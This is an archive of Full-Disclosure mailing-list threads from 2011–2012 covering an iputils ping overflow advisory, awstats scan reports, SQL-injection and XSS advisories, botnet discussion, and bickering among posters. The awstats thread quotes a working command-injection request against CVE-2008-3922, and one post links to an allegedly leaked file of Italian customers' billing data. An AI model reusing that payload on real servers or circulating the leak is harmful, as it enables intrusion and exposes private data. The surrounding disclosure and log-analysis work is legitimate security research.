> end to go to and certain hash values end up in the bit bucket - so it all 
> works
> great unless your DHCP-supplied IP address is (when treated as a 32-bit 
> number)
> equal to 17 mod 39 or some siimilarl wierdness.  The troubleshooting fun gets
> even worse if the hash contains both the IP and the ephemeral port number - 
> this
> can result in intermittent issues that will take *month* to find and 
> diagnose, because
> most users will just hit reload, and since the ephemeral port on their end 
> changed,
> it works for them and they never report it...
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] is my ISP lying or stupid?

[James Condron]

Chances are a datacenter monkey pulled a power cable out, or they meant router 
and didn't want to confuse you.

Worked for a couple of ISPs, they all send the same emails out when something 
breaks.

Shouldn't worry about it. Also wouldn't get all higher-than-thou/ "who are 
these noobs".

Just get on with your life and admit they're lying to you and couldn't give a 
fuck whether you know it or not.

Sent using BlackBerry® from Orange

-Original Message-
From: rancor 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Fri, 16 Mar 2012 19:04:17 
To: Jerry dePriest
Cc: 
Subject: Re: [Full-disclosure] is my ISP lying or stupid?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [iputils] Integer overflow in iputils ping/ping6 tools

[James Condron]

Awww come on,

Let the have their win. You're the kind of guy who tells a 3 year old their 
finger painting on the fridge is shit, aren't you.


Sent using BlackBerry® from Orange

-Original Message-
From: Marcus Meissner 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Tue, 13 Mar 2012 23:17:41 
To: Christophe Alladoum
Cc: 
Subject: Re: [Full-disclosure] [iputils] Integer overflow in iputils
ping/ping6 tools

Hi,

How is this different from writing a fork bomb?

Ciao, Marcus

On Tue, Mar 13, 2012 at 09:42:29AM +0100, Christophe Alladoum wrote:
> [ Description ]
> 
> An integer overflow was found in iputils/ping_common.c main_loop() function
> which could lead to excessive CPU usage when triggered (could lead to DoS). 
> This
> means that both ping and ping6 are vulnerable.
> 
> 
> [ Proof-Of-Concept ]
> 
> Specify "big" interval (-i option) for ping/ping6 tool:
> {{{
> $ ping -i 3600 google.com
> PING google.com (173.194.66.102) 56(84) bytes of data.
> 64 bytes from we-in-f102.1e100.net (173.194.66.102): icmp_req=1 ttl=50 
> time=11.4 ms
> [...]
> }}}
> 
> And check your CPU usage (top, htop, etc.)
> 
> 
> [ Explanation ]
> 
> Here, ping will loop in main_loop() loop in this section of code :
> {{{
> /* from iputils-s20101006 source */
> /* ping_common.c */
> 
> 546 void main_loop(int icmp_sock, __u8 *packet, int packlen)
> 547 {
> [...]
> 559 for (;;) {
> [...]
> 572 do {
> 573 next = pinger();
> 574 next = schedule_exit(next);
> 575 } while (next <= 0);
> [...]
> 588 if ((options & (F_ADAPTIVE|F_FLOOD_POLL)) || 
> next [...]
> 593 if (1000*next <= 100/(int)HZ) {
> }}}
> 
> If interval parameter (-i) is set, then condition L593 will overflow (ie. 
> value
> exceeding sizeof(signed integer)), making this statement "always true" for big
> values (e.g. -i 3600). As a consequence, ping process will start looping
> actively as long as condition is true (could be pretty long).
> 
> As far as looked, this bug is unlikely to be exploitable besides provoking
> Denial-Of-Service.
> 
> 
> [ Affected versions ]
> 
> Tested on Fedora/Debian/Gentoo Linux system (2.6.x x86_32 and x86_64) on 
> iputils
> version 20101006. ping6 seems also to be affected since it's relying on same
> ping_common.c functions.
> 
> Since iputils is not maintained any longer
> (http://www.spinics.net/lists/netdev/msg191346.html), patch must be applied 
> from
> source.
> 
> 
> [ Patch ]
> Quick'n dirty patch (full patch in appendix) is to cast test result as long 
> long:
> {{{
> 593  if (((long long)1000*next) <= (long 
> long)100/(int)HZ) {
> }}}
> 
> 
> [ Credits ]
> * Christophe Alladoum (HSC)
> * Romain Coltel (HSC)
> 
> 
> -- 
> Christophe Alladoum - 
> Hervé Schauer Consultants - 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 

-- 
Working, but not speaking, for the following german company:
SUSE LINUX Products GmbH, HRB 16746 (AG Nuernberg)
Geschaeftsfuehrer: Jeff Hawn, Jennifer Guild, Felix Imendoerffer

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Iciniti Store SQL Injection - Security Advisory - SOS-12-003

[James Parson]

This advisory is incorrect.

The reported SQL injection vulnerability is not present within the version
(4.3.3683.31484) of Iciniti Store claimed to be affected.

In addition, the legitimacy of the supplied proof of concept is
questionable. The SQL statement shown would only be syntactically valid
when injected and elicit a response containing the database version in the
rarest of circumstances. It appears to have not been verified by Sense of
Security.

ICINITI Corporation has been contacted to comment on this advisory.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Botnet Traffic

[James Smith]

thank this is very helpful as well.

-Original Message- 
From: Hurgel Bumpf
Sent: Thursday, February 23, 2012 8:52 PM
To: ja...@smithwaysecurity.com ; full-disclosure@lists.grok.org.uk
Subject: AW: [Full-disclosure] Botnet Traffic




check the arbor atlas for worldwide threats and sources..

http://atlas.arbor.net/

-HB

--
James Smith schrieb am Do., 23. Feb 2012 17:20 EST:

>Hello,
>
>Can anyone on this list provide botnet network traffic for analysis, or Ip’s 
>which have been infected.
>-- 
>Sincerely;
>
>
>James Smith
>CEO, CEH, Security Analyst
>Email: ja...@smithwaysecurity.com
>Phone: 1877-760-1953
>Website: www.SmithwaySecurity.com
>
>
>CONFIDENTIALITY NOTICE: This communication with its contents may contain 
>confidential and/or legally privileged information. It is solely for the 
>use of the intended recipient(s). Unauthorized interception, review, use or 
>disclosure is prohibited and may violate applicable laws including the 
>Electronic Communications Privacy Act. If you are not the intended 
>recipient, please contact the sender and destroy all copies of the 
>communication.
>
>- This communication is confidential to the parties it was intended to 
>serve - 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Botnet Traffic

[James Smith]

Hello,

Can anyone on this list provide botnet network traffic for analysis, or Ip’s 
which have been infected.
-- 
Sincerely;


James Smith
CEO, CEH, Security Analyst
Email: ja...@smithwaysecurity.com
Phone: 1877-760-1953
Website: www.SmithwaySecurity.com


CONFIDENTIALITY NOTICE: This communication with its contents may contain 
confidential and/or legally privileged information. It is solely for the use of 
the intended recipient(s). Unauthorized interception, review, use or disclosure 
is prohibited and may violate applicable laws including the Electronic 
Communications Privacy Act. If you are not the intended recipient, please 
contact the sender and destroy all copies of the communication.

- This communication is confidential to the parties it was intended to serve -___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fwd: Re: Operation Bring Peace To Machines

[james]

Now that's a controversial stance.

True; but you'll always find idiots who will fight it.

Sent from my BlackBerry® wireless device

-Original Message-
From: Ian Hayes 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Sat, 18 Feb 2012 12:37:42 
To: 
Subject: Re: [Full-disclosure] Fwd: Re: Operation Bring Peace To Machines

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.

[james]

Waidaminnit... Didn't you try to sell me a belkin the other day?

Conflict of interest there
Sent from my BlackBerry® wireless device

-Original Message-
From: valdis.kletni...@vt.edu
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Fri, 10 Feb 2012 11:06:49 
To: 
Cc: 
Subject: Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps
vulnerability.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] can you answer this?

[james]

So what's the question?

--Original Message--
From: RandallM
Sender: full-disclosure-boun...@lists.grok.org.uk
To: funsec
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] can you answer this?
Sent: 3 Feb 2012 08:20

since no one could answer the last one how bout this. In my FW log
Trust (our 10.0.0.0. network) to untrust picked this up:

2012-02-02 10:08:10 7.254.254.254:68 7.254.254.255:67 0.0.0.0:0
0.0.0.0:0 DHCP 0 sec. 0 0 Traffic Denied

My "any" to "any" denied queue.

-- 
been great, thanks
RandyM
a.k.a System

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Sent from my BlackBerry® wireless device
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Facebook seems to think my Arch Linux box has malware on it

[James Condron]

Yeah, you really weren't, you were telling us how you would have handled it, 
with all the buzzwords and terms you could have thought of.

Hell, I'm surprised you didn't manage to get the word 'synergy' in there.

" I would do a dns lookup and then compare those results to that of a public 
web service, and save the links for the AVs to check if they have any malicious 
history associated with them."

Reads like s bad Hollywood script

"First I would ping the phone number and see if I could telnet to the ICMP, 
then get the PTR of the MAC address and use an ARP overflow and spoof the TTL 
of the Window Size and..." (etc. etc.)

What are you suggesting; take a look at where the request is coming from and 
make a decision based on that whether the software is being punted by facebook 
or a third party?

Fine- just say that; make your suggestion and get on with your life. Its a 
little trite as advice goes, but if thats all you can contribute then go for it.

Coming in with your Marky-Mark talk of "First I'd get the first hijacker and 
use his head to kill the second hijacker and then I'd be all like 'yeah, lets 
land the plane here- let me drive'" is not very helpful

On 20 Jan 2012, at 22:37, Gage Bystrom wrote:

> What the hell are you talking about? I was just giving some advice on how he 
> could check if it was legit or not if it happens again.
> 
> What crawled up your ass and died this morning?
> 
> On Jan 20, 2012 2:21 PM,  wrote:
> You should tell us what you would have done had you been on one of the 
> hijacked sept 11 planes.
> 
> Bet things would have gone down different then, amiright?
> 
> Sent from my BlackBerry® wireless device
> 
> -Original Message-
> From: Gage Bystrom 
> Sender: full-disclosure-boun...@lists.grok.org.uk
> Date: Fri, 20 Jan 2012 13:29:01
> To: Wesley Kerfoot; 
> full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Facebook seems to think my Arch Linux box has
>  malware on it
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Facebook seems to think my Arch Linux box has malware on it

[james]

You should tell us what you would have done had you been on one of the hijacked 
sept 11 planes.

Bet things would have gone down different then, amiright?

Sent from my BlackBerry® wireless device

-Original Message-
From: Gage Bystrom 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Fri, 20 Jan 2012 13:29:01 
To: Wesley Kerfoot; 
full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Facebook seems to think my Arch Linux box has
 malware on it

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fwd: Rate Stratfor's Incident Response

[James Smith]

Well I have been in their irc chat rooms. A few of them are very Intelligent in 
Information Security. Well if you are only defining say #AntiSec- I would say 
about less then a third.
As for the other 97% they just know how to attack and exploit vulnerabilities.

From: Laurelai 
Sent: Wednesday, January 11, 2012 3:17 AM
To: Kyle Creyts 
Cc: full-disclosure@lists.grok.org.uk ; James Smith 
Subject: Re: [Full-disclosure] Fwd: Rate Stratfor's Incident Response

On 1/11/12 1:15 AM, Kyle Creyts wrote: 
  How many of those engaged in these attacks _could_ actually fix the vulns 
they exploit? What is a good "rough estimate" in your opinion?

  On Jan 11, 2012 12:47 AM, "Laurelai"  wrote:

On 1/10/12 11:32 PM, James Smith wrote:
> Well I do agree with what you are stating. As I have seen incidents
> like this happen to many times.
> This mailing list is a big part of the IT Security community.
>
>
>
> -Original Message- From: Laurelai
> Sent: Wednesday, January 11, 2012 1:18 AM
> To: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Fwd: Rate Stratfor's Incident Response
>
> On 1/10/12 10:18 PM, Byron Sonne wrote:
>>> Don't piss off a talented adolescent with computer skills.
>> Amen! I love me some stylin' pwnage :)
>>
>> Whether they were skiddies or actual hackers, it's still amusing (and
>> frightening to some) that companies who really should know better, in
>> fact, don't.
>>
> And again, if companies hired these people, most of whom come from
> disadvantaged backgrounds and are self taught they wouldn't have as much
> a reason to be angry anymore. Most of them feel like they don't have any
> real opportunities for a career and they are often right. Microsoft
> hired some kid who hacked their network, it is a safe bet he isn't going
> to be causing any trouble anymore. Talking about the trust issue, who
> would you trust more the person who has all the certs and experience
> that told you your network was safe or the 14 year old who proved him
> wrong? We all know if that kid had approached microsoft with his exploit
> in a responsible manner they would have outright ignored him, that's why
> this mailing list exists, because companies will ignore security issues
> until it bites them in the ass to save a buck.
>
> People are way too obsessed with having certifications that don't
> actually teach practical intrusion techniques. If a system is so fragile
> that teenagers can take it down with minimal effort then there is a
> serious problem with the IT security industry. Think about it how long
> has sql injection been around? There is absolutely no excuse for being
> vulnerable to it. None what so ever. These kids are showing people the
> truth about the state of security online and that is whats making people
> afraid of them. They aren't writing 0 days every week, they are using
> vulnerabilities that are publicly available. Using tools that are
> publicly available, tools that were meant to be used by the people
> protecting the systems. Clearly the people in charge of protecting these
> system aren't using these tools to scan their systems or else they would
> have found the weaknesses first.
>
> The fact that government organizations and large name companies and
> government contractors fall prey to these types of attacks just goes to
> show the level of hypocrisy inherent to the situation. Especially when
> their solution to the problem is to just pass more and more restrictive
> laws (as if that's going to stop them). These kids are showing people
> that the emperor has no clothes and that's whats making people angry,
> they are putting someones paycheck in danger. Why don't we solve the
> problem by actually addressing the real problem and fixing systems that
> need to be fixed? Why not hire these kids with the time and energy on
> their hands to probe for these weaknesses on a large scale? The ones
> currently in the job slots to do this clearly aren't doing it.  I bet if
> they started replacing these people with these kids it would shake the
> lethargy out of the rest of them and you would see a general increase in
> competence and security. Knowing that if you get your network owned by a
> teenager will not only get you fired, but replaced with said teenager is
> one hell of an incentive to make sure you get it right.
>
>
> Yes they would have to be taught additional skills to round out wha

Re: [Full-disclosure] Who's Behind the Koobface Botnet? - An OSINT Analysis

[james]

I was working at coreix when we took down the original C&C and have icq 
numbers, source and logs.

What's your point? I'm sure its good work but this was all done over a year ago 
and is on copies in a police store room somewhere.


Sent from my BlackBerry® wireless device

-Original Message-
From: Dancho Danchev 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Mon, 9 Jan 2012 07:02:06 
To: 
Subject: [Full-disclosure] Who's Behind the Koobface Botnet? - An OSINT
Analysis

Hi everyone,

In this post, I will perform an OSINT analysis, exposing one of the
key botnet masters behind the infamous Koobface botnet, that I have
been extensively profiling and infiltrating since day one. I will
include photos of the botnet master, his telephone numbers, multiple
email addresses, license plate for a BMW, and directly connect him
with the infrastructure -- now offline or migrated to a different
place -- of Koobface 1.0.

The analysis is based on a single mistake that the botnet master made
- namely using his personal email for registering a domain parked
within Koobface's command and control infrastructure, that at a
particular moment in time was directly redirecting to the ubiquitous
fake Youtube page pushed by the Koobface botnet.

http://ddanchev.blogspot.com/2012/01/whos-behind-koobface-botnet-osint.html

Regards
--
Dancho Danchev
Cyber Threats/CyberCrime Analyst | Security Blogger, ZDNet at CBS
Interactive | Securiy Blogger at Webroot
Personal Blog: http://ddanchev.blogspot.com
ZDNet Blog: http://blogs.zdnet.com/security
Webroot Blog: http://blog.webroot.com
Twitter: http://twitter.com/danchodanchev
LinkedIn: http://nl.linkedin.com/in/danchodanchev
Facebook: http://facebook.com/dancho.danchev
Skype ID: dancho_danchev_

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] sai8 User Data Exposition

[James Condron]

Oh brilliant,

Exactly what we use FD for; to hear about unverified data and read worthless 
text files.

4chan generally care about this sort of thing; go get your 'lulz' son.

On 6 Jan 2012, at 09:46, Augustus Clay wrote:

> billing and data of 100K italian users...
> The very secure company is: SAI 8 S.P.A.
> web site: http://www.sai8.it
> 
> http://www.mediafire.com/?5jh7p1vp8voykez
> http://849801.dnaq.cn/sai8file
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] facebook

[James Condron]

Yup...

jc@egg:~$ dig TXT astalavista.com

; <<>> DiG 9.6-ESV-R4-P3 <<>> TXT astalavista.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6237
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;astalavista.com.   IN  TXT

;; AUTHORITY SECTION:
astalavista.com.10789   IN  SOA ns.ch-inter.net. 
hostmaster.metanet.ch. 2002010198 10800 3600 604800 43200

;; Query time: 25 msec
;; SERVER: 192.168.1.1#53(192.168.1.1)
;; WHEN: Mon Jan  2 22:57:32 2012
;; MSG SIZE  rcvd: 105


On 2 Jan 2012, at 22:55, valdis.kletni...@vt.edu wrote:

> On Mon, 02 Jan 2012 12:47:37 PST, t0hitsugu said:
>> uh..wtf?
> 
>> On Jan 2, 2012 12:46 PM,  wrote:
>>> Ladies and gentleman, I will be unplugged from my email until the 17th of
>>> January.
> 
> That should read: "Ladies and gentlemen, my email address will be available 
> for
> social engineering and other abuse until the 17th of January". :)
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] CertificationMagazine - Blind SQL Injection Vulnerability Super vulnerability-lab hack

[james]

Thought the same thing;

Spoken -> Slander
Literature -> Libel

Is the way we learnt it way back when in school.

Mind, that wasn't the biggest problem in that email.


Sent from my BlackBerry® wireless device

-Original Message-
From: "Thor (Hammer of God)" 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Sat, 24 Dec 2011 23:57:36 
To: Tomy; 
resea...@vulnerability-lab.com
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] CertificationMagazine - Blind SQL
Injection   Vulnerability Super vulnerability-lab hack

>i am not member of ariko-security / but it's not possible what you have 
>wriiten it's primitive slander.

FYI, you can't "write" slander.  One "speaks" slander, one "writes" libel.  
t

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] New awstats.pl vulnerability?

[james]

>From analysis on compromised sites I've been receiving abuse messages for at 
>$day_job they're launched from irc bots on compromised servers, mainly cpanel- 
>cpanel is cool for novices but skimps on security out of the box.

Will dig out some signatures when I get into the office.

Sent from my BlackBerry® wireless device

-Original Message-
From: Lamar Spells 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Thu, 22 Dec 2011 23:23:11 
To: Nikolay Kichukov
Cc: 
Subject: Re: [Full-disclosure] New awstats.pl vulnerability?

Here is an update on this:

Over the past week, we have seen the awstats activity continue, but
morph to include other vulnerabilities.  Details of this are at
http://foxtrot7security.blogspot.com/2011/12/attacks-against-awstats-also-includes.html
-- but the summary is that we have seen activity change to include
Local File Inclusion and command injection in phpAlbum and other
components written in PHP.

We started seeing today some activity related to phpthumb and
CVE-2010-1598...  Details of this are at
http://foxtrot7security.blogspot.com/2011/12/new-attempts-to-exploit-old-phpthumb.html

I am really curious as to the motivation of the parties deploying
these types of scans.  I understand that they would like to find
vulnerable systems to compromise... but for what purpose?  Sending
spam?  So far, based on what I am seeing, it looks like they are
compromising systems just to have those systems look for more systems
to compromise.  At this point, I have to assume that they are still in
the construction and building phase...

On Fri, Dec 16, 2011 at 2:43 PM, Lamar Spells  wrote:
> Here are some additional IPs and some analysis of the IPs in question.
>  Looks like very few of the scanning IPs are running awstats, but many
> are legitimate business running old apache versions.  I am guessing
> they didn't self install an awstats scanner...
>
> http://foxtrot7security.blogspot.com/2011/12/importance-of-patching.html
>
>
> On Tue, Dec 13, 2011 at 7:51 AM, Lamar Spells  wrote:
>> Today we are also seeing requests like this one which is looking to
>> exploit CVE-2008-3922:
>>
>> GET /awstatstotals/awstatstotals.php ?
>> sort={${passthru(chr(105).chr(100))}}{${exit()}}
>>
>>
>>
>> On Tue, Dec 13, 2011 at 2:17 AM, Nikolay Kichukov  wrote:
>>> -BEGIN PGP SIGNED MESSAGE-
>>> Hash: SHA1
>>>
>>> Same here, I even tried to notify a bunch of the ISP registrators of the IP 
>>> address range those originated from.
>>>
>>> - -Nik
>>>
>>>
>>>
>>> On 12/13/2011 07:30 AM, Bruce Ediger wrote:
 On Mon, 12 Dec 2011, Lamar Spells wrote:

> For the past several days, I have been seeing thousands of requests
> looking for awstats.pl like this one:

 Yeah, me too.  They just started up.  I haven't seen any awstats.pl
 requests since 2010-05-18, and now I've gotten batches of them, since
 about 2011-11-22, but heavier since the start of December.

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
>>> -BEGIN PGP SIGNATURE-
>>> Version: GnuPG v1.4.11 (GNU/Linux)
>>> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
>>>
>>> iQEcBAEBAgAGBQJO5vwQAAoJEDFLYVOGGjgX8oEH/i3kjBAtJcT1DJvJVcRX4O+9
>>> t2UcvehxpyjalhCttTmQrE8EcLrtGS62K0ZziNQPvXirOtJ0ERcaARsQFiTT7fCi
>>> YyEuNDa15nx+wS2dgnKWEyCjz356RobtXgFflrbfHNPmBCRGd/qM3VzquUDYRdef
>>> E+JtU0J3RgilXxMFLrZK5GHwZOUKNebv/T6bRPescMzRsX/DO89Csv0kWJM9xvyI
>>> kd0El+/thw8aj9/21dB/JWhdbiBozuKd2MG1hTog/xKFVzVqdTzkNoZ7Ok15n91v
>>> LoAx7cLqDInmx1syDLOSMhzRoyqGAA9Uq/WuTpDqTDcHjVwjGJPeYjc97dIJWdY=
>>> =0+7+
>>> -END PGP SIGNATURE-
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CA20111208-01: Security Notice for CA SiteMinder

[Williams, James K]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CA20111208-01: Security Notice for CA SiteMinder

Issued: December 08, 2011

CA Technologies Support is alerting customers to a potential risk in 
CA SiteMinder. A vulnerability exists that can allow a malicious user 
to execute a reflected cross site scripting (XSS) attack. CA 
Technologies has issued patches to address the vulnerability.

The vulnerability, CVE-2011-4054, occurs due to insufficient 
validation of postpreservationdata parameter input utilized in the 
login.fcc form. A malicious user can submit a specially crafted 
request to effectively hijack a victim’s browser.

Risk Rating

Medium

Platform

All

Affected Products

CA SiteMinder R6 SP6 CR7 and earlier
CA SiteMinder R12 SP3 CR8 and earlier

Non-Affected Products

CA SiteMinder R6 SP6 CR8
CA SiteMinder R12 SP3 CR9

How to determine if the installation is affected

Check the Web Agent log or Installation log to obtain the installed 
release version. Note that the "webagent.log" file name is 
configurable by the SiteMinder administrator.

Solution

CA is issuing patches to address the vulnerability.

CA SiteMinder R6:
Upgrade to R6 SP6 CR8 or later (Expected Availability: January 2012)

CA SiteMinder R12:
Upgrade to R12 SP3 CR9 or later

CR releases can be found on the CA SiteMinder 
Hotfix/Cumulative Release page:
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={5AE61E
29-C3DE-405E-9151-9EEA72D965CE}.

Workaround

None

References

CVE-2011-4054 - CA SiteMinder login.fcc XSS

Acknowledgement

CVE-2011-4054 - Jon Passki of Aspect Security, via CERT

Change History

Version 1.0: Initial Release

If additional information is required, please contact CA 
Technologies Support at https://support.ca.com.

If you discover a vulnerability in CA Technologies products, please 
report your findings to the CA Technologies Product Vulnerability 
Response Team.
support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782


Thanks and regards,
Ken Williams, Director
CA Technologies Product Vulnerability Response Team
CA Technologies Business Unit Operations
wilj...@ca.com 

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.9.1 (Build 287)
Charset: utf-8

wj8DBQFO4glXeSWR3+KUGYURAotyAJ4nT1pij7Nb2uOCKgXnhGvK5If7DgCfX5ht
GdIeR80Ie/6he0y0K5uQLoQ=
=U3C2
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] DDIVRT-2011-38 KnowledgeTree login.php Blind SQL Injection

[James Condron]

Well kids,

There is a next  to useless disclosure.

Its is also customary to show some kind f timeline of your correspondence with 
the vendor.

I swear to $deity we used to have standards here,

On 7 Dec 2011, at 16:51, ddivulnalert wrote:

> Title
> -
> DDIVRT-2011-38 KnowledgeTree login.php Blind SQL Injection
> 
> Severity
> 
> High
> 
> Date Discovered
> ---
> November 18, 2011
> 
> Discovered By
> -
> Digital Defense, Inc. Vulnerability Research Team
> Credit: sxkeebler and r@b13$
> 
> Vulnerability Description
> -
> The KnowledgeTree login.php login page is vulnerable to a blind SQL
> injection vulnerability within the username field.  An attacker can
> leverage this flaw to execute arbitrary SQL commands and extract
> sensitive information from the backend database using standard blind
> SQL exploitation techniques.  Additionally, an attacker may be able to
> leverage this flaw to compromise the database server host OS.
> 
> Solution Description
> 
> KnowledgeTree has released a patch which addresses the issue. The new
> source is available at:
> http://wiki.knowledgetree.org/Security_advisory:_KnowledgeTree_login.php_Blind_SQL_Injection
> 
> Tested Systems / Software
> -
> KnowledgeTree Version 3.7.0.2 (community edition)
> 
> Vendor Contact
> --
> Vendor Name: KnowledgeTree, Inc.
> Vendor Website: http://www.knowledgetree.com/
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] one of my servers has been compromized

[James Condron]

John,

All good thoughts but can we show the server was rooted?

In otherwords; instead of an attacker getting root and then adding this to a 
botnet this way is it not more likely that the original attack added the server 
in one step to avoid the need to do this?

Attackers, from my experience, don't need to worry about rooting when they can 
find a vuln, exploit and add to a botnet- they don't need to be able to SSH in, 
nor do they need a shell; the IRC channel takes care of all they need.

Additionally suppose we're looking at your old fashioned shellcode payload- 
probably  a fair assumption. What happens if this is not using bash, perhaps sh 
isn't pointing to bash, suppose even csh or zsh.

Lets  also not forget without a proper disassembly of the server pma is only a 
likely vector.

In this case I tend to suggest that OP takes a stab at the time of compromise 
to get a backup that can be trusted, takes a new hard drive, restore from 
backup and upgrade everything that can be possibly upgraded (and so on- the 
same repair stuff we all do in our sleep; nothing new) and uses the old data to 
go through the logs, go through the dumped data from memory, assuming fmem and 
understanding of /proc/iomem



On 5 Dec 2011, at 17:20, John Jacobs wrote:

> 
>> For future reference, and for the benefit of people searching for
>> solutions to similar problems: You've made the most common rookie
>> mistake. You have already trashed potentially critical information
>> about the attack by trying to clean up the server first. Don't do
>> that.
> 
> Tim, while I do believe there is some truth in what you are saying here, I 
> respectfully disagree in that this tends to be a run-of-the-mill IRC bot as 
> evidenced by the Undernet advisory.  This looks like a skiddie-de-jour attack 
> against PHPMyAdmin and nothing to be concerned with regarding cloning disk 
